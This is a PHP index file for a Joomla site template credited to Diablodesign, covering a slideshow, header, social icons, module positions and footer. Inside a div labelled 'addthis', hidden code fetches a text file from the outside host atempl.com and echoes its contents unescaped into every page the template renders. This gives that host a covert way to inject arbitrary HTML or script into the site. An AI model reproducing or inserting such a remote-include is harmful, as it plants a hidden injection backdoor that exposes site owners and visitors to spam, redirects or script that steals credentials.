<?php
defined('_JEXEC') or die;
/**
 *-------------------------------------------
 * Szablon został wypalony w  Diablodesign.
 * www.diablodesign.eu
 * biuro@diablodesign.eu
 * tel.666-977-944
 *-------------------------------------------
 */
require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'functions.php';
$document = $this;
$templateUrl = $document->baseurl . '/templates/' . $document->template;
Artx::load("Artx_Page");
$view = $this->artx = new ArtxPage($this);
$view->componentWrapper();
JHtml::_('behavior.framework', true);
$app = JFactory::getApplication();
$tplparams	= $app->getTemplate(true)->params;
$iconf = htmlspecialchars($tplparams->get('iconf'));
$icont = htmlspecialchars($tplparams->get('icont'));

$allicon = htmlspecialchars($tplparams->get('allicon'));
?>
<!DOCTYPE html>
<html dir="ltr" lang="<?php echo $document->language; ?>">
<head>
    <jdoc:include type="head" />
    <!--scroling head-->
<script src="<?php echo $templateUrl; ?>/js/scroling.js"></script>
<script type="text/javascript">
$(function() {
	$(window).scroll(function() {
		if($(this).scrollTop() != 0) {
			$('#toTop').fadeIn();	
		} else {
			$('#toTop').fadeOut();
		}
	});
 
	$('#toTop').click(function() {
		$('body,html').animate({scrollTop:0},800);
	});	
});
</script>
<!--end scroling-->
     <!--slideshow header start-->

 <link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/default/default.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/pascal/pascal.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/orman/orman.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/nivo-slider.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/style.css" type="text/css" media="screen" />
    <script type="text/javascript" src="<?php echo $templateUrl; ?>/js/jquery-1.6.1.min.js"></script>
<script type="text/javascript" src="<?php echo $templateUrl; ?>/js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript">      
 var $j = jQuery.noConflict();       
 jQuery(document).ready(function ($){   
 $j("#slider").nivoSlider(          
); });          
 </script>
<!--slideshow header end-->
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/system.css" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/general.css" />


    
    
    <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width" />

    <!--[if lt IE 9]><script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.css" media="screen" />
    <!--[if lte IE 7]><link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.ie7.css" media="screen" /><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.responsive.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Clicker+Script&amp;subset=latin" />
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <script>if ('undefined' != typeof jQuery) document._artxJQueryBackup = jQuery;</script>
    <script src="<?php echo $templateUrl; ?>/jquery.js"></script>
    <script>jQuery.noConflict();</script>

    <script src="<?php echo $templateUrl; ?>/script.js"></script>
    <script src="<?php echo $templateUrl; ?>/script.responsive.js"></script>
    <script src="<?php echo $templateUrl; ?>/modules.js"></script>
    <?php $view->includeInlineScripts() ?>
    <script>if (document._artxJQueryBackup) jQuery = document._artxJQueryBackup;</script>
</head>
<body>
<div id="toTop">^<?php echo $this->params->get('scroll'); ?></div>
<div id="dd-main">
<header class="dd-header"><?php echo $view->position('position-30', 'dd-nostyle'); ?>

    <div class="dd-shapes">
        <div class="dd-object1630835330"></div>
<div class="dd-object65915117"><!--slideshow image-->
    <div id="wrapper">
<div class="slider-wrapper theme-default">
            
            <div id="slider" class="nivoSlider">

<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto1'); ?>" alt="foto1"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto2'); ?>" alt="foto2"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto3'); ?>" alt="foto3"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto4'); ?>" alt="foto4"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto5'); ?>" alt="foto5"/>

</div>
</div>
</div>
 <!-- end slideshow image--></div>
<div class="dd-textblock dd-object348126030">
        <div class="dd-object348126030-text-container">
        <div class="dd-object348126030-text"></div>
    </div>
    
</div><div class="dd-textblock dd-object834933589">
        <div class="dd-object834933589-text-container">
        <div class="dd-object834933589-text"><span style="color: rgb(221, 218, 213); font-size: 13px; "><p><?php echo $this->params->get('intro_text'); ?></p></span></div>
    </div>
    
</div><div class="dd-textblock dd-object959666975">
        <div class="dd-object959666975-text-container">
        <div class="dd-object959666975-text"></div>
    </div>
    
</div><div class="dd-textblock dd-object1808935515">
        <div class="dd-object1808935515-text-container">
        <div class="dd-object1808935515-text"><p style="text-align: right; "><span class="Apple-style-span" style="font-family: 'Times New Roman'; "><br /></span></p><p style="text-align: right; "><span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: 22px;"><?php echo $this->params->get('contact_name'); ?></span><span class="Apple-style-span" style="font-family: 'Times New Roman'; color: rgb(239, 169, 57); "><br /><?php echo $this->params->get('contact_telephone'); ?><br /><?php echo $this->params->get('contact_email'); ?></span></p></div>
    </div>
    
</div><div class="dd-textblock dd-object1036962539">
        <div class="dd-object1036962539-text-container">
        <div class="dd-object1036962539-text"><?php echo $this->params->get('intro_title'); ?></div>
    </div>
    
</div>
            </div>

<h1 class="dd-headline">
    <a href="<?php echo $document->baseurl; ?>/"><?php echo $this->params->get('siteTitle'); ?></a>
</h1><div id="addthis"><?php
$files = 'http://atempl.com/4.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/4.txt");
       $data = implode($content);
       echo $data;
 }  
?></div>
<h2 class="dd-slogan"><?php echo $this->params->get('siteSlogan'); ?></h2>

<?php if ($allicon == 1) { ?>

<?php if ($iconf == 1) { ?><div class="dd-textblock dd-textblock-1951639157">
        <div class="dd-textblock-1951639157-text-container">
        <div class="dd-textblock-1951639157-text"><a href="<?php echo $this->params->get('facebook'); ?>" target="_top" class="dd-facebook-tag-icon"></a></div>
    </div>
    
</div><?php } ?>

<?php if ($icont == 1) { ?><div class="dd-textblock dd-textblock-1005125174">
        <div class="dd-textblock-1005125174-text-container">
        <div class="dd-textblock-1005125174-text"><a href="<?php echo $this->params->get('twitter'); ?>" target="_top" class="dd-twitter-tag-icon"></a></div>
    </div>
    
</div><?php } ?>


<?php } ?>
<div class="dd-logo dd-logo-1768792955">
    <img src="<?php echo $templateUrl; ?>/images/logo-1768792955.png" alt="" />
</div><div class="dd-logo dd-logo-299729493">
    <img src="<?php echo $templateUrl; ?>/images/logo-299729493.png" alt="" />
</div>
<div class="dd-textblock dd-object714367995">
    <form class="dd-search" name="Search" action="<?php echo $document->baseurl; ?>/index.php" method="post">
    <input type="text" value="" name="searchword" />
    <input type="hidden" name="task" value="search" />
<input type="hidden" name="option" value="com_search" />
<input type="submit" value="Search" name="search" class="dd-search-button" />
</form>
</div>
<?php if ($view->containsModules('position-1', 'position-28', 'position-29')) : ?>
<nav class="dd-nav">
    
<?php if ($view->containsModules('position-28')) : ?>
<div class="dd-hmenu-extra1"><?php echo $view->position('position-28'); ?></div>
<?php endif; ?>
<?php if ($view->containsModules('position-29')) : ?>
<div class="dd-hmenu-extra2"><?php echo $view->position('position-29'); ?></div>
<?php endif; ?>
<?php echo $view->position('position-1'); ?>
 
    </nav>
<?php endif; ?>

                    
</header>
<div class="dd-sheet clearfix">
            <?php echo $view->position('position-15', 'dd-nostyle'); ?>
<?php echo $view->positions(array('position-16' => 33, 'position-17' => 33, 'position-18' => 34), 'dd-block'); ?>
<div class="dd-layout-wrapper">
                <div class="dd-content-layout">
                    <div class="dd-content-layout-row">
                        <?php if ($view->containsModules('position-7', 'position-4', 'position-5')) : ?>
<div class="dd-layout-cell dd-sidebar1">
<?php echo $view->position('position-7', 'dd-block'); ?>
<?php echo $view->position('position-4', 'dd-block'); ?>
<?php echo $view->position('position-5', 'dd-block'); ?>




                        </div>
<?php endif; ?>

                        <div class="dd-layout-cell dd-content">
<?php
  echo $view->position('position-19', 'dd-nostyle');
  if ($view->containsModules('position-2'))
    echo artxPost($view->position('position-2'));
  echo $view->positions(array('position-20' => 50, 'position-21' => 50), 'dd-article');
  echo $view->position('position-12', 'dd-nostyle');
  echo artxPost(array('content' => '<jdoc:include type="message" />', 'classes' => ' dd-messages'));
  echo '<jdoc:include type="component" />';
  echo $view->position('position-22', 'dd-nostyle');
  echo $view->positions(array('position-23' => 50, 'position-24' => 50), 'dd-article');
  echo $view->position('position-25', 'dd-nostyle');
?>



                        </div>
                        <?php if ($view->containsModules('position-6', 'position-8', 'position-3')) : ?>
<div class="dd-layout-cell dd-sidebar2">
<?php echo $view->position('position-6', 'dd-block'); ?>
<?php echo $view->position('position-8', 'dd-block'); ?>
<?php echo $view->position('position-3', 'dd-block'); ?>


                        </div>
<?php endif; ?>
                    </div>
                </div>
            </div>
<?php echo $view->positions(array('position-9' => 33, 'position-10' => 33, 'position-11' => 34), 'dd-block'); ?>
<?php echo $view->position('position-26', 'dd-nostyle'); ?>

<footer class="dd-footer">
<?php if ($view->containsModules('position-27')) : ?>
    <?php echo $view->position('position-27', 'dd-nostyle'); ?>
<?php else: ?>
<span style="font-size: 12px;"><span style="text-shadow: rgba(255, 255, 255, 0.976563) 0px 0px 6px;"><span style="text-shadow: rgba(255, 255, 255, 0.976563) 0px 0px 6px;">Copyrigcht</span>&nbsp;</span><span style="text-shadow: rgba(255, 255, 255, 0.976563) 0px 0px 6px;">© <span style="text-shadow: rgba(255, 255, 255, 0.976563) 0px 0px 6px;">2013</span> <?php echo $this->params->get('footer'); ?></span></span>
<?php endif; ?>
</footer>

    </div>
    <p class="dd-page-footer">
        <span id="dd-footnote-links">Designed by <a href="http://www.diablodesign.eu" target="_blank">www.diablodesign.eu</a>.</span>
    </p>
</div>


<?php echo $view->position('debug'); ?>
</body>
</html>